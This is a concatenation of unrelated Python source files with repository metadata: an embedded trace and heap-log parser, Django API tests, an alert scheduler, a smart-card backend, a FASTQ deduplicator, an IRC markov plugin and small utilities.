SocketServer.UDPServer.__init__(self, (host, port), UDPRequestHandler)
NetReader.__init__(self, tmo)
def reader_create(trc_src, tmo):
"""
Creates trace reader.
Parameters
----------
trc_src : string
trace source URL. Supports 'file:///path/to/file' or (tcp|udp)://host:port
tmo : int
read timeout
Returns
-------
Reader
reader object or None if URL scheme is not supported
"""
url = urlparse(trc_src)
if len(url.scheme) == 0 or url.scheme == 'file':
if os.name == 'nt':
# workaround for Windows path
return FileReader(trc_src[7:], tmo)
else:
return FileReader(url.path, tmo)
if url.scheme == 'tcp':
return TCPReader(url.hostname, url.port, tmo)
if url.scheme == 'udp':
return UDPReader(url.hostname, url.port, tmo)
return None
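# Usage sketch: creating a reader for a trace source and pulling one line from
# it. The URL and timeout are placeholders; cleanup() stops the reader.
#
#   reader = reader_create('file:///tmp/apptrace.log', 1)
#   try:
#       line = reader.readline()
#       print(line, end='')
#   finally:
#       reader.cleanup()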
class TraceEvent:
"""
Base class for all trace events.
"""
def __init__(self, name, core_id, evt_id):
self.name = name
self.ctx_name = 'None'
self.in_irq = False
self.core_id = core_id
self.id = evt_id
self.ts = 0
self.params = {}
@property
def ctx_desc(self):
if self.in_irq:
return 'IRQ "%s"' % self.ctx_name
return 'task "%s"' % self.ctx_name
def to_jsonable(self):
res = self.__dict__
params = {}
for p in self.params:
params.update(self.params[p].to_jsonable())
res['params'] = params
return res
class TraceDataProcessor:
"""
Base abstract class for all trace data processors.
"""
def __init__(self, print_events, keep_all_events=False):
"""
Constructor.
Parameters
----------
print_events : bool
if True every event will be printed as they arrive
keep_all_events : bool
if True all events will be kept in self.events in the order they arrive
"""
self.print_events = print_events
self.keep_all_events = keep_all_events
self.total_events = 0
self.events = []
# This can be changed by the root processor that includes several sub-processors.
# It is used to access methods of the root processor which can contain methods/data common to all sub-processors.
# Common info could be current execution context, info about running tasks, available IRQs etc.
self.root_proc = self
def _print_event(self, event):
"""
Base method to print an event.
Parameters
----------
event : object
Event object
"""
print('EVENT[{:d}]: {}'.format(self.total_events, event))
def print_report(self):
"""
Base method to print report.
"""
print('Processed {:d} events'.format(self.total_events))
def cleanup(self):
"""
Base method to make cleanups.
"""
pass
def on_new_event(self, event):
"""
Base method to process event.
"""
if self.print_events:
self._print_event(event)
if self.keep_all_events:
self.events.append(event)
self.total_events += 1
class LogTraceParseError(ParseError):
"""
Log trace parse error exception.
"""
pass
def get_str_from_elf(felf, str_addr):
"""
Retrieves string from ELF file.
Parameters
----------
felf : elffile.ELFFile
open ELF file handle to retrieve the string from
str_addr : int
address of the string
Returns
-------
string
string or None if it was not found
"""
tgt_str = ''
for sect in felf.iter_sections():
if sect['sh_addr'] == 0 or (sect['sh_flags'] & elfconst.SH_FLAGS.SHF_ALLOC) == 0:
continue
if str_addr < sect['sh_addr'] or str_addr >= sect['sh_addr'] + sect['sh_size']:
continue
sec_data = sect.data()
for i in range(str_addr - sect['sh_addr'], sect['sh_size']):
if type(sec_data) is str:
ch = sec_data[i]
else:
ch = str(chr(sec_data[i]))
if ch == '\0':
break
tgt_str += ch
if len(tgt_str) > 0:
return tgt_str
return None
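# Usage sketch: fetching a NUL terminated string from an ELF image using the
# helper above. The ELF path and address are placeholders.
#
#   felf = elffile.ELFFile(open('build/app.elf', 'rb'))
#   s = get_str_from_elf(felf, 0x3f400020)
#   felf.stream.close()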
class LogTraceEvent:
"""
Log trace event.
"""
def __init__(self, fmt_addr, log_args):
"""
Constructor.
Parameters
----------
fmt_addr : int
address of the format string
log_args : list
list of log message arguments
"""
self.fmt_addr = fmt_addr
self.args = log_args
def get_message(self, felf):
"""
Retrieves log message.
Parameters
----------
felf : elffile.ELFFile
open ELF file handle to retrieve the format string from
Returns
-------
string
formatted log message
Raises
------
LogTraceParseError
if format string has not been found in ELF file
"""
fmt_str = get_str_from_elf(felf, self.fmt_addr)
if not fmt_str:
raise LogTraceParseError('Failed to find format string for 0x%x' % self.fmt_addr)
prcnt_idx = 0
for i, arg in enumerate(self.args):
prcnt_idx = fmt_str.find('%', prcnt_idx, -2) # TODO: check str ending with %
if prcnt_idx == -1:
break
prcnt_idx += 1 # goto next char
if fmt_str[prcnt_idx] == 's':
# find string
arg_str = get_str_from_elf(felf, self.args[i])
if arg_str:
self.args[i] = arg_str
else:
self.args[i] = '<None>'
fmt_str = fmt_str.replace('%p', '%x')
return fmt_str % tuple(self.args)
class BaseLogTraceDataProcessorImpl:
"""
Base implementation for log data processors.
"""
def __init__(self, print_log_events=False, elf_path=''):
"""
Constructor.
Parameters
----------
print_log_events : bool
if True every log event will be printed as they arrive
elf_path : string
path to ELF file to retrieve format strings for log messages
"""
if len(elf_path):
self.felf = elffile.ELFFile(open(elf_path, 'rb'))
else:
self.felf = None
self.print_log_events = print_log_events
self.messages = []
def cleanup(self):
"""
Cleanup
"""
if self.felf:
self.felf.stream.close()
def print_report(self):
"""
Prints log report
"""
print('=============== LOG TRACE REPORT ===============')
print('Processed {:d} log messages.'.format(len(self.messages)))
def on_new_event(self, event):
"""
Processes log events.
Parameters
----------
event : LogTraceEvent
Event object.
"""
msg = event.get_message(self.felf)
self.messages.append(msg)
if self.print_log_events:
print(msg, end='')
class HeapTraceParseError(ParseError):
"""
Heap trace parse error exception.
"""
pass
class HeapTraceDuplicateAllocError(HeapTraceParseError):
"""
Heap trace duplicate allocation error exception.
"""
def __init__(self, addr, new_size, prev_size):
"""
Constructor.
Parameters
----------
addr : int
memory block address
new_size : int
size of the new allocation
prev_size : int
size of the previous allocation
"""
HeapTraceParseError.__init__(self, """Duplicate alloc @ 0x{:x}!
New alloc is {:d} bytes,
previous is {:d} bytes.""".format(addr, new_size, prev_size))
class HeapTraceEvent:
"""
Heap trace event.
"""
def __init__(self, trace_event, alloc, toolchain='', elf_path=''):
"""
Constructor.
Parameters
----------
trace_event : TraceEvent
trace event object related to this heap event
alloc : bool
True for allocation event, otherwise False
toolchain : string
toolchain prefix to retrieve source line locations using addresses
elf_path : string
path to ELF file to retrieve format strings for log messages
"""
self.trace_event = trace_event
self.alloc = alloc
self.toolchain = toolchain
self.elf_path = elf_path
if self.alloc:
self.size = self.trace_event.params['size'].value
else:
self.size = None
@property
def addr(self):
return self.trace_event.params['addr'].value
@property
def callers(self):
return self.trace_event.params['callers'].value
def __repr__(self):
if len(self.toolchain) and len(self.elf_path):
callers = os.linesep
for addr in self.trace_event.params['callers'].value:
if addr == 0:
break
callers += '{}'.format(addr2line(self.toolchain, self.elf_path, addr))
else:
callers = ''
for addr in self.trace_event.params['callers'].value:
if addr == 0:
break
if len(callers):
callers += ':'
callers += '0x{:x}'.format(addr)
if self.alloc:
return '[{:.9f}] HEAP: Allocated {:d} bytes @ 0x{:x} from {} on core {:d} by: {}'.format(self.trace_event.ts,
self.size, self.addr,
self.trace_event.ctx_desc,
self.trace_event.core_id,
callers)
else:
return '[{:.9f}] HEAP: Freed bytes @ 0x{:x} from {} on core {:d} by: {}'.format(self.trace_event.ts,
self.addr, self.trace_event.ctx_desc,
self.trace_event.core_id, callers)
class BaseHeapTraceDataProcessorImpl:
"""
Base implementation for heap data processors.
"""
def __init__(self, print_heap_events=False):
"""
Constructor.
Parameters
----------
print_heap_events : bool
if True every heap event will be printed as they arrive
"""
self._alloc_addrs = {}
self.allocs = []
self.frees = []
self.heap_events_count = 0
self.print_heap_events = print_heap_events
def on_new_event(self, event):
"""
Processes heap events. Keeps track of active allocations list.
Parameters
----------
event : HeapTraceEvent
Event object.
"""
self.heap_events_count += 1
if self.print_heap_events:
print(event)
if event.alloc:
if event.addr in self._alloc_addrs:
raise HeapTraceDuplicateAllocError(event.addr, event.size, self._alloc_addrs[event.addr].size)
self.allocs.append(event)
self._alloc_addrs[event.addr] = event
else:
            # do not treat free on unknown addresses as errors, because these blocks could be allocated when tracing was disabled
if event.addr in self._alloc_addrs:
event.size = self._alloc_addrs[event.addr].size
self.allocs.remove(self._alloc_addrs[event.addr])
del self._alloc_addrs[event.addr]
else:
self.frees.append(event)
def print_report(self):
"""
Prints heap report
"""
print('=============== HEAP TRACE REPORT ===============')
print('Processed {:d} heap events.'.format(self.heap_events_count))
if len(self.allocs) == 0:
            print('OK - Heap errors were not found.')
return
leaked_bytes = 0
for alloc in self.allocs:
leaked_bytes += alloc.size
print(alloc)
for free in self.frees:
if free.addr > alloc.addr and free.addr <= alloc.addr + alloc.size:
print('Possible wrong free operation found')
print(free)
print('Found {:d} leaked bytes in {:d} blocks.'.format(leaked_bytes, len(self.allocs)))
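# Illustrative usage sketch (not part of the original module): a concrete heap
# processor is expected to subclass BaseHeapTraceDataProcessorImpl, receive
# HeapTraceEvent objects one by one, and print a summary at the end, e.g.
#
#     proc = MyHeapTraceDataProcessor(print_heap_events=True)  # hypothetical subclass
#     for event in parsed_heap_events:                         # events produced by a parser elsewhere
#         proc.on_new_event(event)
#     proc.print_report()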
| 28.356201 | 130 | 0.513911 |
a0cee9287f2381c26acad42998008b4e3c29ce3a | 7,622 | py | Python | projects/tests.py | dymaxionlabs/analytics-backend | fb801b184e4e510d54e8addb283fd202c9dfe7b1 | [
"BSD-3-Clause"
] | null | null | null | projects/tests.py | dymaxionlabs/analytics-backend | fb801b184e4e510d54e8addb283fd202c9dfe7b1 | [
"BSD-3-Clause"
] | 1 | 2022-01-21T20:07:50.000Z | 2022-01-21T20:07:50.000Z | projects/tests.py | dymaxionlabs/analytics-backend | fb801b184e4e510d54e8addb283fd202c9dfe7b1 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib.auth.models import User
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient, APITestCase
from projects.models import Project, ProjectInvitationToken
def loginWithAPI(client, username, password):
response = client.post('/auth/login/',
dict(username=username, password=password))
if response.status_code != 200 or 'key' not in response.data:
raise RuntimeError('Login failed in test. Status code {}'.format(
response.status_code))
token = response.data['key']
# Set Authorization header with Token
client.credentials(HTTP_AUTHORIZATION=token)
return token
class LoginViewTest(TestCase):
def setUp(self):
self.test_user = User(email="test@prueba.com", username='test')
self.test_user.set_password('secret')
self.test_user.save()
self.client = APIClient()
def test_login_ok(self):
response = self.client.post(
'/auth/login/', {
'username': 'test',
'password': 'secret'
},
format='json')
self.assertEquals(200, response.status_code)
self.assertTrue('key' in response.data)
def test_login_fail(self):
response = self.client.post(
'/auth/login/', {
'username': 'test',
'password': 'bad_password'
},
format='json')
self.assertEquals(400, response.status_code)
self.assertEquals(["Unable to log in with provided credentials."],
response.data['non_field_errors'])
class LogoutViewTest(TestCase):
def setUp(self):
self.test_user = User(email="test@prueba.com", username='test')
self.test_user.set_password('secret')
self.test_user.save()
self.client = APIClient()
def test_logout_ok(self):
loginWithAPI(self.client, username='test', password='secret')
response = self.client.post('/auth/logout/', {}, format='json')
self.assertEqual(200, response.status_code)
self.assertEqual({'detail': 'Successfully logged out.'}, response.data)
def test_logout_invalid_token(self):
self.client.credentials(HTTP_AUTHORIZATION='foobar')
response = self.client.post('/auth/logout/', format='json')
self.assertEqual(401, response.status_code)
self.assertEquals("Invalid token.", response.data['detail'])
class UserViewSetTest(APITestCase):
def setUp(self):
self.user = User(email='user@test.com', username='user')
self.user.set_password('secret')
self.user.save()
self.admin_user = User(
email='admin@test.com', username='admin', is_staff=True)
self.admin_user.set_password('secret')
self.admin_user.save()
def test_user_list_only_shows_logged_in_user(self):
loginWithAPI(self.client, 'user', 'secret')
url = reverse('user-list')
response = self.client.get(url, {}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual([{
'username': 'user',
'email': 'user@test.com',
'first_name': '',
'last_name': ''
}], response.data['results'])
def test_user_list_shows_all_if_admin(self):
loginWithAPI(self.client, 'admin', 'secret')
url = reverse('user-list')
response = self.client.get(url, {}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
expectedUsers = [
{
'username': 'AnonymousUser',
'email': '',
'first_name': '',
'last_name': '',
},
{
'username': 'user',
'email': 'user@test.com',
'first_name': '',
'last_name': '',
},
{
'username': 'admin',
'email': 'admin@test.com',
'first_name': '',
'last_name': '',
},
]
self.assertEqual(expectedUsers, response.data['results'])
def test_user_create_fail(self):
pass
def test_user_update_fail(self):
pass
def test_user_delete_fail(self):
pass
class TestAuthViewTest(TestCase):
def setUp(self):
self.test_user = User(email="test@prueba.com", username='test')
self.test_user.set_password('secret')
self.test_user.save()
self.client = APIClient()
def test_auth_ok(self):
loginWithAPI(self.client, 'test', 'secret')
response = self.client.get('/test/auth', {}, format='json')
self.assertEqual(200, response.status_code)
def test_auth_fail(self):
response = self.client.get('/test/auth', {}, format='json')
self.assertEqual(401, response.status_code)
class ContactViewTest(TestCase):
def test_create_ok(self):
response = self.client.post(
'/contact/', {
'email': 'john@doe.com',
'message': 'This is a test message',
},
format='json')
self.assertEquals(200, response.status_code)
self.assertEquals('Contact message has been sent',
response.data['detail'])
class ConfirmProjectInvitationViewTest(TestCase):
def setUp(self):
self.test_user = User(email="test@prueba.com", username='test')
self.test_user.set_password('secret')
self.test_user.save()
self.client = APIClient()
def test_create_public_token(self):
# Create a project
project = Project.objects.create(name='testproject')
# Create a project invitation token (without email)
invite_token = ProjectInvitationToken.objects.create(project=project)
self.assertFalse(self.test_user.has_perm('view_project', project))
loginWithAPI(self.client, 'test', 'secret')
url = '/projects/invitations/{key}/confirm/'.format(
key=invite_token.key)
response = self.client.post(url, {}, format='json')
self.assertEquals(200, response.status_code)
self.assertTrue(self.test_user.has_perm('view_project', project))
def test_create_public_token_new_user(self):
# Create a project
project = Project.objects.create(name='testproject')
# Create a project invitation token (without email)
invite_token = ProjectInvitationToken.objects.create(project=project)
# Register a new user with API
response = self.client.post(
'/auth/registration/',
dict(
username='test2',
email='test@example.com',
password1='secret0345',
password2='secret0345'),
format='json')
self.assertEquals(201, response.status_code)
user_token = response.data['key']
# Get user and check permissions
user = User.objects.get(username='test2')
self.assertFalse(user.has_perm('view_project', project))
# Confirm invitation of user to project
url = '/projects/invitations/{key}/confirm/'.format(
key=invite_token.key)
self.client.credentials(HTTP_AUTHORIZATION=user_token)
response = self.client.post(url, {}, format='json')
self.assertEquals(200, response.status_code)
# Check permissions again
self.assertTrue(user.has_perm('view_project', project))
| 34.488688 | 79 | 0.604041 |
b9dd3cdc777139d70ac5467e0b1e15118b71ab62 | 67 | py | Python | cbrunner/__init__.py | RobbieHember/fcgadgets | d968991ea185d48df8d674d290b7e03bfc8843d4 | [
"Apache-2.0"
] | 2 | 2021-11-18T21:29:37.000Z | 2022-01-13T23:40:42.000Z | cbrunner/__init__.py | RobbieHember/fcgadgets | d968991ea185d48df8d674d290b7e03bfc8843d4 | [
"Apache-2.0"
] | null | null | null | cbrunner/__init__.py | RobbieHember/fcgadgets | d968991ea185d48df8d674d290b7e03bfc8843d4 | [
"Apache-2.0"
] | null | null | null | name="cbrunner"
__all__=["cbrun","cbrun_annproc","cbrun_utilities"] | 33.5 | 51 | 0.776119 |
325e6ec0d4429ebb174401abffed720b8600f1c7 | 1,917 | py | Python | netwatch/scheduler.py | tkmcclellan/NetWatch | d195b39a4d8782153e8f26585049ff78f5fc56f7 | [
"MIT"
] | 1 | 2021-02-12T16:27:55.000Z | 2021-02-12T16:27:55.000Z | netwatch/scheduler.py | tkmcclellan/NetWatch | d195b39a4d8782153e8f26585049ff78f5fc56f7 | [
"MIT"
] | 14 | 2021-02-11T16:19:00.000Z | 2021-03-16T16:03:59.000Z | netwatch/scheduler.py | tkmcclellan/NetWatch | d195b39a4d8782153e8f26585049ff78f5fc56f7 | [
"MIT"
] | null | null | null | """Module for running scheduled NetWatch jobs.
This module processes NetWatch alerts according to their
frequency.
Todo:
* Find a way to process alerts in parallel and shut down those processes immediately
"""
import threading
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
from croniter import croniter
from netwatch.common import process_alert
from netwatch.store import store
class Scheduler:
"""A job scheduler for running NetWatch jobs.
Attributes:
stop_scheduler (threading.Event): Event for stopping the
scheduler from another thread.
thread (threading.Thread): Thread for running scheduler handler.
executor (concurrent.futures.ThreadPoolExecutor): Executor
for running scheduled NetWatch Alerts in parallel.
"""
def __init__(self):
self.stop_scheduler = threading.Event()
self.thread = threading.Thread(target=self._scheduler_handler, args=())
self.executor = ThreadPoolExecutor(3)
def start(self):
"""Starts the scheduler"""
self.stop_scheduler.clear()
self.thread.start()
def stop(self):
"""Stops the scheduler"""
self.stop_scheduler.set()
self.thread.join()
self.executor.shutdown()
def _scheduler_handler(self):
while not self.stop_scheduler.is_set():
jobs = []
for alert in store.get_alerts():
time = datetime.now()
time = datetime(
time.year, time.month, time.day, time.hour, time.minute
) # no seconds value
itr = croniter(alert.frequency, time)
if time == itr.get_current(datetime):
jobs.append(alert.id)
if len(jobs) > 0:
self.executor.submit(process_alert, (jobs))
self.stop_scheduler.wait(60)
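# Illustrative usage sketch (not part of the original module); assumes the caller
# owns the application main loop and stops the scheduler on shutdown:
#
#     scheduler = Scheduler()
#     scheduler.start()
#     try:
#         run_main_loop()  # hypothetical application loop
#     finally:
#         scheduler.stop()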
| 28.61194 | 88 | 0.637454 |
f8384979704184e461c5b390000a58adb9a8079c | 1,846 | py | Python | main.py | guo-yong-zhi/Maze | 4f627f293b94171e3989e2ce60a892d0ec8d8942 | [
"MIT"
] | null | null | null | main.py | guo-yong-zhi/Maze | 4f627f293b94171e3989e2ce60a892d0ec8d8942 | [
"MIT"
] | null | null | null | main.py | guo-yong-zhi/Maze | 4f627f293b94171e3989e2ce60a892d0ec8d8942 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Dec 11 15:02:26 2017
@author: momos
"""
import numpy as np
from matplotlib import pyplot as plt
array = np.array
def neiPairsOf(idim, trans=-1, shift=None):
shift = shift or (lambda im,pairs:[np.roll(im,(d,r),axis=(0,1)) for d,r in pairs])
def toNeiPairs(a, b):
a = a.reshape(-1, 1)
b = b.reshape(-1, 1)
pairs = np.hstack([a,b])
pairs = pairs[pairs[:,0] != trans]
pairs = pairs[pairs[:,1] != trans]
return pairs
neiPairs = [toNeiPairs(idim, neimage) for neimage in shift(idim, [(1,0),(0,1)])]
return np.vstack(neiPairs)
def to_id_image(im, transOld=0, transNew=-1):
idim = np.arange(im.ravel().shape[0]).reshape(im.shape)
idim[im==transOld] = transNew
return idim
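# Worked example for to_id_image: with im = [[0, 1], [1, 1]] the cell ids are
# arange(4).reshape(2, 2) = [[0, 1], [2, 3]]; cells where im == 0 become the
# transparent marker -1, giving [[-1, 1], [2, 3]].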
def toCoords(ids, shape):
ids = array(ids)
m,n = shape
r = ids // n
c = ids % n
return np.column_stack([r,c])
def toIDs(coords, shape):
coords = array(coords)
m, n = shape
r, c = coords.T
if isinstance(r, np.ndarray):
r[r<0] += m
c[c<0] += n
else:
r = r if r>=0 else r + m
c = c if c>=0 else c + n
return r * n + c
def plotGroup(im, group):
plt.imshow(im)
yx = toCoords(list(group), im.shape)
    plt.plot(yx[:,1],yx[:,0],'r.')
plt.axis("off")
plt.show()
def shift_neonespadding(arr, disp_pairs):
h,w = arr.shape
paded = np.empty((h+2,w+2), dtype=int)
paded[(0,-1),:] = -1
paded[:,(0,-1)] = -1
paded[1:-1,1:-1] = arr
shift = lambda d,r: paded[-d+1:-d+1+h, -r+1:-r+1+w]
return [shift(d,r) for d,r in disp_pairs]
img = np.ones((10,10),np.int8)
idim = to_id_image(img)
nepairs = neiPairsOf(idim, shift=shift_neonespadding)
| 24.945946 | 87 | 0.534128 |
e1bec4fa6af7b2642384626bae7c70a324484fcb | 3,028 | py | Python | platypush/backend/scard/__init__.py | RichardChiang/platypush | 1777ebb0516118cdef20046a92caab496fa7c6cb | [
"MIT"
] | null | null | null | platypush/backend/scard/__init__.py | RichardChiang/platypush | 1777ebb0516118cdef20046a92caab496fa7c6cb | [
"MIT"
] | null | null | null | platypush/backend/scard/__init__.py | RichardChiang/platypush | 1777ebb0516118cdef20046a92caab496fa7c6cb | [
"MIT"
] | null | null | null | import json
from platypush.backend import Backend
from platypush.message.event.scard import SmartCardDetectedEvent, SmartCardRemovedEvent
class ScardBackend(Backend):
"""
Generic backend to read smart cards and NFC tags and trigger an event
whenever a device is detected.
Extend this backend to implement more advanced communication with custom
smart cards.
Triggers:
* :class:`platypush.message.event.scard.SmartCardDetectedEvent` when a smart card is detected
* :class:`platypush.message.event.scard.SmartCardRemovedEvent` when a smart card is removed
Requires:
* **pyscard** (``pip install pyscard``)
"""
def __init__(self, atr=None, *args, **kwargs):
"""
        :param atr: If set, the backend will trigger events only for card(s) with the specified ATR(s). It can be either an ATR string (space-separated hex octets) or a list of ATR strings. Default: none (any card will be detected)
"""
        from smartcard.CardType import AnyCardType, ATRCardType
        from smartcard.util import toBytes
super().__init__(*args, **kwargs)
self.ATRs = []
if atr:
if isinstance(atr, str):
self.ATRs = [atr]
elif isinstance(atr, list):
self.ATRs = atr
else:
                raise RuntimeError("Unsupported ATR: \"{}\" - type: {}, "
                                   "supported types: string, list".format(
                                       atr, type(atr)))
self.cardtype = ATRCardType( *[toBytes(atr) for atr in self.ATRs] )
else:
self.cardtype = AnyCardType()
def run(self):
from smartcard.CardRequest import CardRequest
from smartcard.Exceptions import NoCardException, CardConnectionException
from smartcard.util import toHexString
super().run()
self.logger.info('Initialized smart card reader backend - ATR filter: {}'.
format(self.ATRs))
prev_atr = None
reader = None
while not self.should_stop():
try:
cardrequest = CardRequest(timeout=None, cardType=self.cardtype)
cardservice = cardrequest.waitforcard()
cardservice.connection.connect()
reader = cardservice.connection.getReader()
atr = toHexString(cardservice.connection.getATR())
if atr != prev_atr:
self.logger.info('Smart card detected on reader {}, ATR: {}'.
format(reader, atr))
self.bus.post(SmartCardDetectedEvent(atr=atr, reader=reader))
prev_atr = atr
except Exception as e:
if isinstance(e, NoCardException) or isinstance(e, CardConnectionException):
self.bus.post(SmartCardRemovedEvent(atr=prev_atr, reader=reader))
else:
self.logger.exception(e)
prev_atr = None
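# Illustrative extension sketch (not part of the original backend): custom smart
# card handling can be added by subclassing ScardBackend and passing the ATR(s)
# of the cards of interest, e.g.
#
#     class MyCardBackend(ScardBackend):
#         def __init__(self, *args, **kwargs):
#             super().__init__(atr='<space-separated hex ATR of your card>', *args, **kwargs)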
# vim:sw=4:ts=4:et:
| 34.409091 | 233 | 0.588507 |
785274ce51a5ae7bb7861cf9d9de1668e29d11ba | 846 | py | Python | src/awsCluster/miRNASeq/DeduplicateFastqFile.py | AspirinCode/jupyter-genomics | d45526fab3de8fcc3d9fef005d4e39368ff3dfdc | [
"MIT"
] | 2 | 2019-01-04T08:17:27.000Z | 2021-04-10T02:59:35.000Z | src/awsCluster/miRNASeq/DeduplicateFastqFile.py | AspirinCode/jupyter-genomics | d45526fab3de8fcc3d9fef005d4e39368ff3dfdc | [
"MIT"
] | null | null | null | src/awsCluster/miRNASeq/DeduplicateFastqFile.py | AspirinCode/jupyter-genomics | d45526fab3de8fcc3d9fef005d4e39368ff3dfdc | [
"MIT"
] | 2 | 2021-09-10T02:57:51.000Z | 2021-09-21T00:16:56.000Z | __author__ = 'Guorong Xu<g1xu@ucsd.edu>'
import sys
def deduplicate(raw_file):
fastq_id_list = {}
print "system is processing " + raw_file
filewriter = open(raw_file.replace("unfilter.fastq", "trim.fastq"), "w")
with open(raw_file, 'r+') as f:
lines = f.readlines()
line_index = 0
printable = True
for line in lines:
if line_index % 4 == 0 and line.rstrip() in fastq_id_list:
printable = False
            if line_index % 4 == 0 and line.rstrip() not in fastq_id_list:
                fastq_id_list.update({line.rstrip():line.rstrip()})
                # new (unseen) record header: remember it and re-enable writing
                printable = True
if printable:
filewriter.write(line)
line_index = line_index + 1
filewriter.close()
f.close()
if __name__ == "__main__":
raw_file = sys.argv[1]
deduplicate(raw_file)
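# Illustrative usage (assumes a FASTQ file whose name contains "unfilter.fastq"):
#   python DeduplicateFastqFile.py sample.unfilter.fastq
# The de-duplicated records are written next to the input as sample.trim.fastq.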
| 24.171429 | 76 | 0.585106 |
1c09d1a15d91cfecb926724101e0c2f8e8660495 | 4,131 | py | Python | bot_modules/py/markov.py | cumdata/irc_bot | 6593215acb7850f435389ae64652d831279f3332 | [
"WTFPL"
] | null | null | null | bot_modules/py/markov.py | cumdata/irc_bot | 6593215acb7850f435389ae64652d831279f3332 | [
"WTFPL"
] | 2 | 2021-09-10T04:15:59.000Z | 2021-09-14T03:30:21.000Z | bot_modules/py/markov.py | cumdata/irc_bot | 6593215acb7850f435389ae64652d831279f3332 | [
"WTFPL"
] | null | null | null | """simple markov chaining for shitposting"""
import asyncio
import os
import pathlib
import random
import colors
import logger
import plugin_api
_logger = logger.LOGGER
# End of Sentence for Markov chaining
EOS = ('.', '?', '!')
def _should_log(msg):
"""Returns bool to log or not
will return False if:
- msg starts with a . (period)
- has color control char (0x03) in it
:param str msg: message
    :returns: bool value whether to log or not
:rtype: bool
"""
if msg.startswith('.'):
return False
if colors.CONTROL_COLOR in msg:
return False
return True
def _maybe_log(msg):
"""Maybe write message to disk. see _should_log method
:param str msg: the message
"""
if not _should_log(msg):
return
if not msg.endswith(EOS):
msg += '.'
proj_folder = pathlib.Path(__file__).parent.parent.parent.resolve()
with open(f'{proj_folder}{os.path.sep}chatter.log', 'a') as f:
msg = msg.strip(' ')
modified_sentence = msg[0].capitalize() + msg[1:]
f.write(f'\n{modified_sentence}')
def _shitpost(seed_word=None):
proj_folder = pathlib.Path(__file__).parent.parent.parent.resolve()
with open(f'{proj_folder}{os.path.sep}chatter.log', "r") as log:
text = log.read()
words = text.split()
model = _build_dict(words)
sentence = _generate_sentence(model, seed_word)
return sentence
def _build_dict(words):
"""Builds a dictionary of words
:param list[str] words: words
:returns: dictionary of words
:rtype: dict
"""
d = {}
for i, word in enumerate(words):
try:
first, second, third = words[i], words[i + 1], words[i + 2]
except IndexError:
break
key = (first, second)
if key not in d:
d[key] = []
d[key].append(third)
return d
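# Worked example (illustrative): _build_dict(["I", "like", "green", "eggs"]) returns
# {("I", "like"): ["green"], ("like", "green"): ["eggs"]} -- each pair of consecutive
# words maps to the list of words observed immediately after that pair.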
def _generate_sentence(d, seed_word):
"""Generate sentence
:param dict d: dict of words
:returns: a sentence based off of the words
:rtype: str
"""
words_set = [key for key in d.keys() if key[0][0].isupper()]
if seed_word:
key_tuples = [
i for i in words_set
if seed_word.lower() in i[0][0].lower() + i[0][1:]
or seed_word.lower() in i[1][0].lower() + i[1][1:]
]
try:
key = random.choice(key_tuples)
except IndexError:
_logger.error('IndexError, using random')
key = random.choice(words_set)
else:
key = random.choice(words_set)
li = []
first, second = key
li.append(first)
li.append(second)
while True:
try:
third = random.choice(d[key])
except KeyError:
break
li.append(third)
if third[-1] in EOS:
break
else:
key = (second, third)
first, second = key
return ' '.join(li)
class Plugin(plugin_api.LocalPlugin):
"""Markov plugin"""
_join_seen = set()
def help_msg(self):
return ".markov <optional arg> to generate random sentence"
async def on_message(self, target, by, message):
await super().on_message(target, by, message)
if not self.enabled:
return
await self.exec_thread(_maybe_log, message)
if message.startswith('.markov'):
parts = message.split(' ')
if len(parts) == 1:
args = None
elif len(parts) > 1:
args = parts[1]
else:
return
sentence = await asyncio.ensure_future(
self.exec_proc(_shitpost, args)
)
await self.client.message(target, sentence)
async def on_join(self, channel, user):
await super().on_join(channel, user)
if not self.enabled:
return
if user in self._join_seen:
return
sentence = await asyncio.ensure_future(
self.exec_proc(_shitpost, user)
)
self._join_seen.add(user)
await self.client.message(channel, sentence)
| 25.343558 | 71 | 0.573469 |
85bb1b6680fc09cbcea38ccf61f15078ca3f5a02 | 636 | py | Python | kws/utils/utils.py | khaykingleb/KWS | 12fa52414cb9135cea6e4d5200b334b7920b6a9e | [
"MIT"
] | null | null | null | kws/utils/utils.py | khaykingleb/KWS | 12fa52414cb9135cea6e4d5200b334b7920b6a9e | [
"MIT"
] | null | null | null | kws/utils/utils.py | khaykingleb/KWS | 12fa52414cb9135cea6e4d5200b334b7920b6a9e | [
"MIT"
] | null | null | null | import random
import os
import numpy as np
import torch
from thop import profile
import tempfile
def seed_everything(seed: int = 42):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.enabled = False
torch.backends.cudnn.deterministic = True
os.environ["CUBLAS_WORKSPACE_CONFIG"] = ":4096:2"
def get_size_in_megabytes(model):
with tempfile.TemporaryFile() as f:
torch.save(model.state_dict(), f)
size = f.tell() / (2 ** 20)
return size
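# Illustrative usage (assumes `model` is any torch.nn.Module):
#   seed_everything(42)
#   print(f"Model size: {get_size_in_megabytes(model):.2f} MB")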
| 25.44 | 53 | 0.701258 |
67305a3aadcca6c68993b57c152eb7d92ddb6bc0 | 1,813 | py | Python | preprocess/test_base.py | Lummetry/CFDS | c2175180e071811dd5aad5fe6bf00976e0b64095 | [
"Apache-2.0"
] | null | null | null | preprocess/test_base.py | Lummetry/CFDS | c2175180e071811dd5aad5fe6bf00976e0b64095 | [
"Apache-2.0"
] | null | null | null | preprocess/test_base.py | Lummetry/CFDS | c2175180e071811dd5aad5fe6bf00976e0b64095 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Copyright 2019 Lummetry.AI (Knowledge Investment Group SRL). All Rights Reserved.
* NOTICE: All information contained herein is, and remains
* the property of Knowledge Investment Group SRL.
* The intellectual and technical concepts contained
* herein are proprietary to Knowledge Investment Group SRL
* and may be covered by Romanian and Foreign Patents,
* patents in process, and are protected by trade secret or copyright law.
* Dissemination of this information or reproduction of this material
* is strictly forbidden unless prior written permission is obtained
* from Knowledge Investment Group SRL.
@copyright: Lummetry.AI
@author: Lummetry.AI - Andrei
@project:
@description:
"""
import numpy as np
import scipy.sparse as sparse
import pandas as pd
